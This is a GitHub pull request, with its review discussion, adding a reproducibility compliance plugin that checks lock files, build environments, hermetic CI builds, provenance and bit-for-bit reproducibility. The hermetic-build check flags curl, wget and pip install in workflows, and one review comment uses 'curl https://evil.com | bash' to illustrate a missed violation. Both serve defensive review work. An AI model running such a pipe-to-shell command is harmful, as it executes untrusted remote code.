Skip to content

feat: scientific reproducibility plugin#138

Open
Marc-cn wants to merge 14 commits into
kusari-oss:mainfrom
Marc-cn:feature/reproducibility-plugin
Open

feat: scientific reproducibility plugin#138
Marc-cn wants to merge 14 commits into
kusari-oss:mainfrom
Marc-cn:feature/reproducibility-plugin

Conversation

@Marc-cn
Copy link
Copy Markdown
Collaborator

@Marc-cn Marc-cn commented Mar 25, 2026

Summary

Adds a new compliance domain covering scientific reproducibility of software
builds. Separate from the OpenSSF baseline which focuses on security — this
covers whether a build can be independently reproduced.

Type of Change

  • New feature (non-breaking change adding functionality)

Framework Changes Checklist

  • Updated framework spec if behavior changed
  • Ran uv run python scripts/validate_sync.py --verbose and it passes
  • Ran uv run python scripts/generate_docs.py and committed any doc changes

Control/TOML Changes Checklist

  • Control metadata defined in TOML (not Python code)
  • SARIF fields (description, severity, help_url) included where appropriate
  • Ran validation to confirm TOML schema compliance

Testing

  • Tests pass locally
  • Added tests for new functionality
  • Linting passes

What was built

  • RE-01.01 (L1) DependenciesPinned — checks for lock files: uv.lock,
    Cargo.lock, package-lock.json, go.sum, etc.
  • RE-01.02 (L1) BuildEnvDeclared — checks for Dockerfile, flake.nix,
    .devcontainer/, .python-version, etc.
  • RE-02.01 (L2) HermeticBuild — scans CI workflows for live network
    fetches: curl, wget, raw pip install
  • RE-02.02 (L2) ProvenanceExists — scans CI workflows for
    sigstore/cosign or slsa-github-generator
  • RE-03.01 (L3) BitForBitReproducible — checks for SOURCE_DATE_EPOCH
    in CI and reprotest / diffoscope usage

Additional Notes

  • validate_sync.py and generate_docs.py fail on Windows due to a pre-existing cp1252 encoding issue unrelated to this PR
  • SARIF fields not yet added to reproducibility.toml — known gap
  • 19 handler tests and 9 implementation tests added, all passing
  • Includes forge/CI detector and plugin protocol extension as foundational dependencies (same as Gittuf PR)

@Marc-cn Marc-cn requested a review from mlieberman85 as a code owner March 25, 2026 18:51
Copy link
Copy Markdown
Contributor

@mlieberman85 mlieberman85 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

PR Review: Scientific Reproducibility Plugin

Tested all 5 handlers against this repo. L1 controls (deps pinned, build env declared) and L2 hermetic build pass. L2 provenance and L3 bit-for-bit are correctly INCONCLUSIVE. The plugin structure follows established patterns.

Bug: Hermetic build handler has false negatives

repro_hermetic_build_handler checks for safe patterns at the file level, not per-line. If any safe pattern (e.g. uv sync) appears anywhere in a workflow file, all suspicious patterns (curl, apt-get install) in that same file are silently ignored:

is_safe = any(safe in content for safe in safe_patterns)
if pattern in content and not is_safe:
    violations.append(...)

A workflow containing both uv sync and curl https://evil.com | bash passes as "hermetic." The safe-pattern check needs to be per-line or per-step, not per-file.

Note: Hermetic build check is a starting point

The RE-02.01 handler greps CI YAML for obvious network fetch commands, which is a reasonable first pass but doesn't verify actual build isolation. It will miss network access from Makefiles, setup.py, or anything not invoked via the checked CLI tools, and will false-fail on legitimate post-build uses of curl/wget. True hermetic build enforcement likely requires an isolation mechanism — something like Witness for runtime attestation, or build systems with built-in sandboxing like Bazel (--sandbox_network=false) or Nix. Worth opening an issue to track evolving this control.

Bug: Same plugin.py indentation issue

Lines 114, 136, 151, 165 — identical to #136 and #137. All Marc-cn PRs share this.

Minor

  • No tests in the diff (PR claims 28 tests). I wrote 44 (31 handler tests + 13 implementation tests), all pass.
  • Remediation for RE-01.01 hardcodes uv lock — won't help non-Python projects
  • Missing SARIF fields (acknowledged)

What's good

  • Well-chosen controls that cover the reproducibility spectrum (L1 basic hygiene → L3 bit-for-bit)
  • Handlers are filesystem-based with no subprocess calls — easy to test, no external tool dependencies
  • Good evidence collection (lists all files checked and found)
  • Conservative defaults — returns INCONCLUSIVE when signals are absent rather than guessing

@Marc-cn
Copy link
Copy Markdown
Collaborator Author

Marc-cn commented Mar 28, 2026

Applied the same fixes from #136 and #137:

  • plugin.py: Protocol indentation fixed, optional handlers moved out to avoid breaking isinstance checks
  • loader.py: forge and build system detection results now stored in platform and primary_language fields
  • Hermetic build handler: fixed the per-file vs per-line bug

"Note: Hermetic build check is a starting point", should we open a GitHub issue to track it? Something like "RE-02.01 HermeticBuild: evolve beyond grep-based heuristic toward runtime attestation".

@mlieberman85
Copy link
Copy Markdown
Contributor

@Marc-cn let's create a tracking issue with how you see this going and we can track where we're going with it and what you plan to support out of the gate and what you plan to support long term.

Copy link
Copy Markdown
Contributor

@mlieberman85 mlieberman85 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Re-review: hermetic build fix is correct, structural questions remain

The per-line refactor of repro_hermetic_build_handler is right and the new regression test (test_pass_does_not_ignore_violations_when_safe_pattern_present) explicitly nails the bug class I flagged. Nice. Workspace registration looks correct; the package will actually be discoverable now.

Fixed since last review ✅

  • Hermetic build per-line check (and a regression test that would have caught the original bug).
  • plugin.py indentation — handled in the shared base path; not in this diff.
  • Workspace registration — root pyproject.toml now lists darnit-reproducibility as a workspace dep.
  • Tests added (14 handler tests + implementation tests).

Still outstanding ⚠️

Tracking issue for HermeticBuild evolution — I asked you to open one a while back so we can plan out what RE-02.01 supports out of the gate vs. long term (Witness / Bazel sandbox / Nix / etc.). I couldn't find one. Could you open it before merge? A short writeup of: (a) what the v0.1 grep heuristic catches and misses, (b) what "true" hermeticity verification would require, (c) which signals you'd want to add next (composite actions, Makefile, setup.py, runtime attestation). Link it from RE-02.01 in reproducibility.toml so the limitation is visible to anyone reading the control.

Structural questions — please clarify before merge

See inline comments. Short version:

  1. Two ways to expose handlers (register_sieve_handlers() + get_check_handlers()) — which does the framework actually consume? If both, why?
  2. Two framework-path entry points (darnit.frameworksget_framework_path() and darnit.implementationsimpl.get_framework_config_path()) returning the same path. Pick one.
  3. [controls."RE-01.01".remediation] exists in TOML but get_remediation_registry() returns {}. Does the framework auto-load TOML remediations, or is there a wiring gap?

None of these break correctness today, but the protocol surface for plugin authors is becoming muddled and worth tightening before another plugin lands.

Minor

  • pyproject.toml and reproducibility.toml both lack trailing newlines (\ No newline at end of file in diff). Add them.
  • RE-01.01 remediation hardcodes uv lock — fine for v0.1 (and the spec_version = "repro v0.1" is honest about scope), but please add a TOML comment noting it's Python-only and a TODO for per-language detection. Otherwise users with Cargo.toml will get a confusing remediation suggestion.
  • get_controls_by_level builds the full 5-control list on every call, then filters. Build once and cache, or just have get_all_controls iterate directly. Cosmetic.
  • spec_version = "repro v0.1" — other implementations use a more URI-like spec_version string ("https://baseline.openssf.org/versions/2025-10-10"). Pick a stable identifier scheme now while there's only one version.

What's good

  • The five controls hit the right reproducibility ladder rungs (pinned deps → declared env → hermetic build → provenance → bit-for-bit), and each is appropriately conservative — INCONCLUSIVE when the signal isn't there, rather than false PASS.
  • Handlers are pure-filesystem with no subprocess calls; trivially testable.
  • Test coverage exercises both happy path and the specific regression case.
  • Plugin structure (entry points, register(), register_sieve_handlers, framework TOML) follows the established pattern from darnit-baseline cleanly.

Verdict: Lift the tracking-issue ask + the three structural clarifications, and this is mergeable. Bug fix itself is approved.

"repro_deps_pinned": handlers.repro_deps_pinned_handler,
"repro_build_env_declared": handlers.repro_build_env_declared_handler,
"repro_hermetic_build": handlers.repro_hermetic_build_handler,
"repro_provenance_exists": handlers.repro_provenance_exists_handler,
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Two handler-exposure surfaces here — register_sieve_handlers() (called from __init__.py:register(), registers directly with the global registry) and get_check_handlers() (returns a dict). Which one does the framework actually consume?

If both: each plugin author now has to keep two parallel lists in sync, and forgetting one will silently break in different ways depending on which code path the framework hits. I'd push for one canonical surface and delete the other.

If the answer is "register_sieve_handlers is the real one, get_check_handlers is for some legacy/MCP-tool path," please drop a comment on get_check_handlers saying so.



def get_framework_path() -> Path:
"""Entry point for framework TOML discovery."""
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Two entry points pointing at the same TOML:

  • darnit.implementationsregister()impl.get_framework_config_path() returns reproducibility.toml
  • darnit.frameworksget_framework_path() returns the same reproducibility.toml

Is the darnit.frameworks entry point still required by the loader, or is get_framework_config_path() on the implementation enough now? If both are required, OK — but please document why so future plugin authors don't have to reverse-engineer it. If only one is needed, drop the other.

level=2,
domain="RE",
metadata={},
),
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

get_remediation_registry() returns {}, but reproducibility.toml defines a real remediation for RE-01.01:

[[controls."RE-01.01".remediation.handlers]]
handler = "exec"
command = ["uv", "lock"]
dry_run_command = ["uv", "lock", "--dry-run"]

Does the framework auto-load TOML-defined remediations and merge them with get_remediation_registry()? If yes, please confirm with a quick test that darnit run --remediate actually picks up the uv lock step. If no, this remediation is dead config and you'd need to expose it through the registry.

dry_run_command = ["uv", "lock", "--dry-run"]

# =============================================================================
# Control: Is the build environment declared?
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

uv lock is Python-specific and will produce a confusing suggestion on, e.g., a Rust or Go project that fails this control because they have no lock file. Two options:

  1. Detect language from project.primary_language (now stored by the loader change in feat: LangGraph agentic orchestrator: state machine, LLM backends, CLI run, human feedback #137) and gate the remediation on python.
  2. For v0.1, just add a TOML comment + # TODO noting this is Python-only and add a tracking issue for per-language remediation.

Either is fine; current state silently misleads non-Python users.

)
break # one violation per line is enough
except Exception:
continue
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The hermetic-build check only looks at .github/workflows/*.{yml,yaml} — but real builds frequently fetch deps from Makefile, setup.py, build.sh, composite-action action.yml, or Containerfile/Dockerfile. A workflow that just runs make build will look hermetic here even if the Makefile does curl ... | bash.

This isn't a blocker for v0.1 (it's a documented heuristic), but the limitation should be (a) noted in the docstring so reviewers understand the signal, and (b) captured in the tracking issue I asked for above so we have a roadmap for tightening it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants